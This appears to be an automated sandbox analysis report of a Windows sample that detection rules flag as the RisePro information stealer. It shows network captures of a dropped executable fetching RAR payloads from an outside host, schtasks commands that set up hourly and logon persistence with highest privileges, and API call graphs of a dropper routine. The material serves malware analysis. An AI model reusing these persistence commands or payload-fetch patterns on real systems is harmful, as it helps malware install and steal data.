                                  Jul 25, 2024 04:53:44.074186087 CEST4971350500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:55.232369900 CEST5050049719193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:55.232434988 CEST4971950500192.168.2.8193.233.132.62
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 25, 2024 04:53:12.283926964 CEST6380653192.168.2.81.1.1.1
                                  Jul 25, 2024 04:53:12.378849983 CEST53638061.1.1.1192.168.2.8
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 25, 2024 04:53:12.283926964 CEST192.168.2.81.1.1.10x8891Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 25, 2024 04:53:12.378849983 CEST1.1.1.1192.168.2.80x8891No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                  • ddos.dnsnb8.net:799
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.84970444.221.84.1057991840C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 04:53:12.499470949 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.84970544.221.84.1057991840C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 04:53:16.374454975 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.84971744.221.84.1057997588C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 04:53:30.109827995 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.84971844.221.84.1057997588C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 04:53:33.321059942 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.84972044.221.84.1057997588C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 04:53:36.239727020 CEST288OUTGET /cj//k3.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.84972144.221.84.1057997588C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 04:53:39.504205942 CEST288OUTGET /cj//k4.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.84972244.221.84.1057997588C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 25, 2024 04:53:42.302660942 CEST288OUTGET /cj//k5.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:22:53:09
                                  Start date:24/07/2024
                                  Path:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe"
                                  Imagebase:0x270000
                                  File size:2'447'360 bytes
                                  MD5 hash:6A672BBDC7865A7518441284D853F8D8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Target ID:2
                                  Start time:22:53:10
                                  Start date:24/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  Imagebase:0x350000
                                  File size:15'872 bytes
                                  MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 92%, ReversingLabs
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:4
                                  Start time:22:53:15
                                  Start date:24/07/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                  Imagebase:0x70000
                                  File size:187'904 bytes
                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:22:53:15
                                  Start date:24/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6ee680000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:22:53:15
                                  Start date:24/07/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                  Imagebase:0x70000
                                  File size:187'904 bytes
                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:7
                                  Start time:22:53:15
                                  Start date:24/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6ee680000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:8
                                  Start time:22:53:16
                                  Start date:24/07/2024
                                  Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                  Imagebase:0x830000
                                  File size:2'447'360 bytes
                                  MD5 hash:6A672BBDC7865A7518441284D853F8D8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 95%, ReversingLabs
                                  Reputation:low
                                  Has exited:false

                                  Target ID:11
                                  Start time:22:53:16
                                  Start date:24/07/2024
                                  Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                  Imagebase:0x830000
                                  File size:2'447'360 bytes
                                  MD5 hash:6A672BBDC7865A7518441284D853F8D8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Target ID:12
                                  Start time:22:53:16
                                  Start date:24/07/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 1572
                                  Imagebase:0x740000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:17
                                  Start time:22:53:26
                                  Start date:24/07/2024
                                  Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                  Imagebase:0x930000
                                  File size:2'447'360 bytes
                                  MD5 hash:6A672BBDC7865A7518441284D853F8D8
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 95%, ReversingLabs
                                  Reputation:low
                                  Has exited:false

                                  Target ID:18
                                  Start time:22:53:27
                                  Start date:24/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  Imagebase:0x590000
                                  File size:15'872 bytes
                                  MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:19
                                  Start time:22:53:45
                                  Start date:24/07/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" "
                                  Imagebase:0xa40000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:20
                                  Start time:22:53:45
                                  Start date:24/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6ee680000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:1.9%
                                    Dynamic/Decrypted Code Coverage:2.7%
                                    Signature Coverage:7.6%
                                    Total number of Nodes:263
                                    Total number of Limit Nodes:26
                                    execution_graph 23580 847000 23582 847044 GetPEB 23580->23582 23586 847077 CreateFileA 23582->23586 23584 847265 23585 84722d 23587 847246 WriteFile 23585->23587 23589 847244 23585->23589 23586->23584 23586->23585 23588 847255 FindCloseChangeNotification WinExec 23587->23588 23588->23584 23589->23588 23590 28ec20 23591 28f0bf 23590->23591 23598 28ec5e 23590->23598 23592 28eca7 setsockopt recv 23592->23598 23594 28f0aa Sleep 23594->23591 23594->23598 23595 28ecff 23632 2d8610 23595->23632 23598->23591 23598->23592 23598->23594 23598->23595 23600 28f09c Sleep 23598->23600 23608 28db60 WSAStartup 23598->23608 23614 284a90 23598->23614 23617 28e060 23598->23617 23599 28ed38 recv 23601 28ed59 recv 23599->23601 23607 28ed7a 23599->23607 23600->23594 23601->23607 23603 2d8610 2 API calls 23603->23607 23606 28edf0 recv 23606->23607 23607->23600 23607->23603 23607->23606 23637 2d5d50 23607->23637 23654 28e460 6 API calls 23607->23654 23609 28db98 23608->23609 23613 28dc56 23608->23613 23610 28dc24 socket 23609->23610 23609->23613 23611 28dc3a connect 23610->23611 23610->23613 23612 28dc4c closesocket 23611->23612 23611->23613 23612->23610 23612->23613 23613->23598 23655 34c6dc 23614->23655 23616 284a9b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23616->23598 23618 2d5d50 2 API calls 23617->23618 23621 28e0aa 23618->23621 23620 28e204 23622 28e44b 23620->23622 23623 28e22e 23620->23623 23662 2d5bd0 23621->23662 23667 352220 RtlAllocateHeap ___std_exception_copy __Getctype 23622->23667 23625 2d8610 2 API calls 23623->23625 23630 28e26e std::_Locinfo::_Locinfo_ctor 23623->23630 23625->23630 23628 28e423 23628->23598 23629 28e3b7 23629->23628 23668 352220 RtlAllocateHeap ___std_exception_copy __Getctype 23629->23668 23630->23629 23631 28e393 WSASend 23630->23631 23631->23629 23631->23630 23633 2d8657 23632->23633 23634 2d8628 std::locale::_Setgloballocale 23632->23634 23670 2dba20 23633->23670 23634->23599 23636 2d866a 23636->23599 23638 2d5d7a 23637->23638 23639 2d5d8b 23638->23639 23640 2d5e32 23638->23640 23641 2d5d97 std::_Locinfo::_Locinfo_ctor 23639->23641 23643 2d5dbc 23639->23643 23646 2d5dfe 23639->23646 23647 2d5df5 23639->23647 23704 272040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23640->23704 23641->23607 23648 34cd02 std::_Facet_Register 2 API calls 23643->23648 23644 2d5e37 23705 271fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 23644->23705 23650 34cd02 std::_Facet_Register 2 API calls 23646->23650 23652 2d5dd6 std::_Locinfo::_Locinfo_ctor 23646->23652 23647->23643 23647->23644 23649 2d5dcf 23648->23649 23649->23652 23706 352220 RtlAllocateHeap ___std_exception_copy __Getctype 23649->23706 23650->23652 23652->23607 23654->23607 23658 34ccdc 23655->23658 23659 34cced GetSystemTimePreciseAsFileTime 23658->23659 23660 34c6ea 23658->23660 23659->23660 23660->23616 23663 2d5c01 23662->23663 23664 2d5bde 23662->23664 23663->23620 23664->23663 23669 352220 RtlAllocateHeap ___std_exception_copy __Getctype 23664->23669 23671 2dbb6c 23670->23671 23672 2dba45 23670->23672 23693 272040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23671->23693 23676 2dbaa6 23672->23676 23677 2dbab3 23672->23677 23679 2dba5a 23672->23679 23674 2dbb71 23694 271fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 23674->23694 23676->23674 23676->23679 23681 34cd02 std::_Facet_Register 2 API calls 23677->23681 23683 2dba6a std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 23677->23683 23685 34cd02 23679->23685 23681->23683 23684 2dbb2a std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 23683->23684 23695 352220 RtlAllocateHeap ___std_exception_copy __Getctype 23683->23695 23684->23636 23686 34cd07 std::_Facet_Register 23685->23686 23688 34cd21 23686->23688 23690 271fa0 Concurrency::cancel_current_task 23686->23690 23697 35b99c 23686->23697 23688->23683 23689 34cd2d 23689->23689 23690->23689 23696 34e0c1 RtlAllocateHeap RtlAllocateHeap __freea ___std_exception_copy 23690->23696 23692 271fe3 23692->23683 23693->23674 23694->23683 23696->23692 23702 36489d __Getctype std::_Facet_Register 23697->23702 23698 3648db 23703 35acaf RtlAllocateHeap __dosmaperr 23698->23703 23700 3648c6 RtlAllocateHeap 23701 3648d9 23700->23701 23700->23702 23701->23686 23702->23698 23702->23700 23703->23701 23704->23644 23705->23649 23708 4e809e5 GetCurrentHwProfileW GetCurrentHwProfileW GetCurrentHwProfileW 23711 356ba6 23712 356bb9 ___std_exception_copy 23711->23712 23717 3568fd 23712->23717 23714 356bce 23724 351f4c RtlAllocateHeap ___std_exception_copy 23714->23724 23716 356bdb 23719 356909 std::locale::_Setgloballocale 23717->23719 23718 35690f 23734 352193 RtlAllocateHeap ___std_exception_copy __Getctype 23718->23734 23719->23718 23721 356952 23719->23721 23725 356a80 23721->23725 23723 35692a 23723->23714 23724->23716 23726 356aa6 23725->23726 23727 356a93 23725->23727 23735 3569a7 23726->23735 23727->23723 23729 356b57 23729->23723 23730 356ac9 23730->23729 23739 353041 23730->23739 23734->23723 23736 3569b8 23735->23736 23738 356a10 23735->23738 23736->23738 23748 35bbad SetFilePointerEx RtlAllocateHeap ___std_exception_copy 23736->23748 23738->23730 23740 35305a 23739->23740 23744 353081 23739->23744 23740->23744 23749 3639f2 23740->23749 23742 353076 23756 362dfb 23742->23756 23745 35bbed 23744->23745 23800 35bacc 23745->23800 23747 35bc06 23747->23729 23748->23738 23750 363a13 23749->23750 23751 3639fe 23749->23751 23750->23742 23763 35acaf RtlAllocateHeap __dosmaperr 23751->23763 23753 363a03 23764 352210 RtlAllocateHeap ___std_exception_copy 23753->23764 23755 363a0e 23755->23742 23758 362e07 std::locale::_Setgloballocale 23756->23758 23757 362e0f 23757->23744 23758->23757 23759 362e48 23758->23759 23761 362e8e 23758->23761 23779 352193 RtlAllocateHeap ___std_exception_copy __Getctype 23759->23779 23761->23757 23765 362f0c 23761->23765 23763->23753 23764->23755 23766 362f34 23765->23766 23778 362f57 23765->23778 23767 362f38 23766->23767 23769 362f93 23766->23769 23785 352193 RtlAllocateHeap ___std_exception_copy __Getctype 23767->23785 23770 362fb1 23769->23770 23771 35bbed 2 API calls 23769->23771 23780 362a51 23770->23780 23771->23770 23774 363010 23776 363079 WriteFile 23774->23776 23774->23778 23775 362fc9 23775->23778 23786 362622 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor _ValidateLocalCookies 23775->23786 23776->23778 23778->23757 23779->23757 23787 36e7b4 23780->23787 23782 362a91 23782->23774 23782->23775 23783 362a63 23783->23782 23796 357780 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor ___std_exception_copy 23783->23796 23785->23778 23786->23778 23788 36e7c1 23787->23788 23789 36e7ce 23787->23789 23797 35acaf RtlAllocateHeap __dosmaperr 23788->23797 23792 36e7da 23789->23792 23798 35acaf RtlAllocateHeap __dosmaperr 23789->23798 23791 36e7c6 23791->23783 23792->23783 23794 36e7fb 23799 352210 RtlAllocateHeap ___std_exception_copy 23794->23799 23796->23782 23797->23791 23798->23794 23799->23791 23805 36814e 23800->23805 23802 35bade 23803 35bafa SetFilePointerEx 23802->23803 23804 35bae6 23802->23804 23803->23804 23804->23747 23806 368170 23805->23806 23807 36815b 23805->23807 23813 368195 23806->23813 23820 35ac9c RtlAllocateHeap __dosmaperr 23806->23820 23818 35ac9c RtlAllocateHeap __dosmaperr 23807->23818 23810 368160 23819 35acaf RtlAllocateHeap __dosmaperr 23810->23819 23811 3681a0 23821 35acaf RtlAllocateHeap __dosmaperr 23811->23821 23813->23802 23815 368168 23815->23802 23816 3681a8 23822 352210 RtlAllocateHeap ___std_exception_copy 23816->23822 23818->23810 23819->23815 23820->23811 23821->23816 23822->23815 23823 4e80cf0 23824 4e80c8d 23823->23824 23826 4e80ce2 23823->23826 23825 4e80cc9 GetCurrentHwProfileW 23824->23825 23824->23826 23825->23826 23945 284ab0 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23954 278b00 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23955 28a100 7 API calls 3 library calls 23940 4e80c55 GetCurrentHwProfileW 23942 2eca10 RtlAllocateHeap 23833 352dd0 23836 352d0e 23833->23836 23835 352de2 23839 352d1a std::locale::_Setgloballocale 23836->23839 23837 352d21 23854 35acaf RtlAllocateHeap __dosmaperr 23837->23854 23839->23837 23841 352d41 23839->23841 23840 352d26 23855 352210 RtlAllocateHeap ___std_exception_copy 23840->23855 23843 352d46 23841->23843 23844 352d53 23841->23844 23856 35acaf RtlAllocateHeap __dosmaperr 23843->23856 23850 3640f8 23844->23850 23847 352d5c 23849 352d31 23847->23849 23857 35acaf RtlAllocateHeap __dosmaperr 23847->23857 23849->23835 23851 364104 std::_Lockit::_Lockit std::locale::_Setgloballocale 23850->23851 23858 36419c 23851->23858 23853 36411f 23853->23847 23854->23840 23855->23849 23856->23849 23857->23849 23861 3641bf 23858->23861 23859 364205 23859->23853 23861->23859 23864 363e63 23861->23864 23862 364220 23868 364823 RtlAllocateHeap __dosmaperr 23862->23868 23867 363e70 __Getctype std::_Facet_Register 23864->23867 23865 363e9b RtlAllocateHeap 23866 363eae __dosmaperr 23865->23866 23865->23867 23866->23862 23867->23865 23867->23866 23868->23859 23958 272540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor 23872 356658 23873 35666b ___std_exception_copy 23872->23873 23878 356533 23873->23878 23875 356677 23885 351f4c RtlAllocateHeap ___std_exception_copy 23875->23885 23877 356683 23879 35653f std::locale::_Setgloballocale 23878->23879 23880 356549 23879->23880 23882 35656c 23879->23882 23900 352193 RtlAllocateHeap ___std_exception_copy __Getctype 23880->23900 23883 356564 23882->23883 23886 3565ca 23882->23886 23883->23875 23885->23877 23887 3565d7 23886->23887 23888 3565fa 23886->23888 23912 352193 RtlAllocateHeap ___std_exception_copy __Getctype 23887->23912 23890 3565f2 23888->23890 23891 353041 4 API calls 23888->23891 23890->23883 23892 356612 23891->23892 23901 36485d 23892->23901 23895 3639f2 RtlAllocateHeap 23896 356626 23895->23896 23905 3624af 23896->23905 23900->23883 23902 364874 23901->23902 23903 35661a 23901->23903 23902->23903 23914 364823 RtlAllocateHeap __dosmaperr 23902->23914 23903->23895 23906 3624d8 23905->23906 23909 35662d 23905->23909 23907 362527 23906->23907 23910 3624ff 23906->23910 23919 352193 RtlAllocateHeap ___std_exception_copy __Getctype 23907->23919 23909->23890 23913 364823 RtlAllocateHeap __dosmaperr 23909->23913 23915 36241e 23910->23915 23912->23890 23913->23890 23914->23903 23916 36242a std::locale::_Setgloballocale 23915->23916 23918 362469 23916->23918 23920 362582 23916->23920 23918->23909 23919->23909 23921 36814e RtlAllocateHeap 23920->23921 23923 362592 23921->23923 23922 362598 23932 3680bd RtlAllocateHeap __dosmaperr 23922->23932 23923->23922 23924 3625ca 23923->23924 23926 36814e RtlAllocateHeap 23923->23926 23924->23922 23927 36814e RtlAllocateHeap 23924->23927 23928 3625c1 23926->23928 23929 3625d6 FindCloseChangeNotification 23927->23929 23930 36814e RtlAllocateHeap 23928->23930 23929->23922 23930->23924 23931 3625f0 23931->23918 23932->23931 23970 35abd8 SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23933 4e80a86 GetCurrentHwProfileW GetCurrentHwProfileW

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 847044-847074 GetPEB 1 847077-84709a 0->1 2 84709d-8470a0 1->2 3 8470a6-8470bc 2->3 4 8471ee-84722b CreateFileA 2->4 5 847110-847116 3->5 6 8470be-8470c5 3->6 27 847265-847269 4->27 28 84722d-847230 4->28 9 847118-84711f 5->9 10 847129-84712f 5->10 6->5 7 8470c7-8470ce 6->7 7->5 11 8470d0-8470d7 7->11 9->10 12 847121-847124 9->12 13 847131-847138 10->13 14 847148-84714e 10->14 11->5 17 8470d9-8470dd 11->17 19 8471bb-8471c0 12->19 13->14 20 84713a-847141 13->20 15 847167-84716f 14->15 16 847150-847157 14->16 24 847171-847178 15->24 25 847188-84718e 15->25 16->15 23 847159-847160 16->23 17->5 26 8470df-8470e3 17->26 21 8471e0-8471e9 19->21 22 8471c2-8471c5 19->22 20->14 29 847143-847146 20->29 21->2 22->21 30 8471c7-8471ca 22->30 23->15 31 847162-847165 23->31 24->25 32 84717a-847181 24->32 34 8471a7-8471ad 25->34 35 847190-847197 25->35 26->19 33 8470e9-84710b 26->33 36 847232-847238 28->36 29->19 30->21 37 8471cc-8471cf 30->37 31->19 32->25 38 847183-847186 32->38 33->1 34->19 40 8471af-8471b6 34->40 35->34 39 847199-8471a0 35->39 41 847246-847252 WriteFile 36->41 42 84723a-847242 36->42 37->21 44 8471d1-8471d4 37->44 38->19 39->34 46 8471a2-8471a5 39->46 40->19 47 8471b8 40->47 43 847255-847262 FindCloseChangeNotification WinExec 41->43 42->36 48 847244 42->48 43->27 44->21 49 8471d6-8471d9 44->49 46->19 47->19 48->43 49->21 50 8471db-8471de 49->50 50->4 50->21
                                    APIs
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00847223
                                    • WriteFile.KERNELBASE(00000000,FFFFCD8F,00003E00,?,00000000), ref: 00847252
                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00847256
                                    • WinExec.KERNEL32(?,00000005), ref: 00847262
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
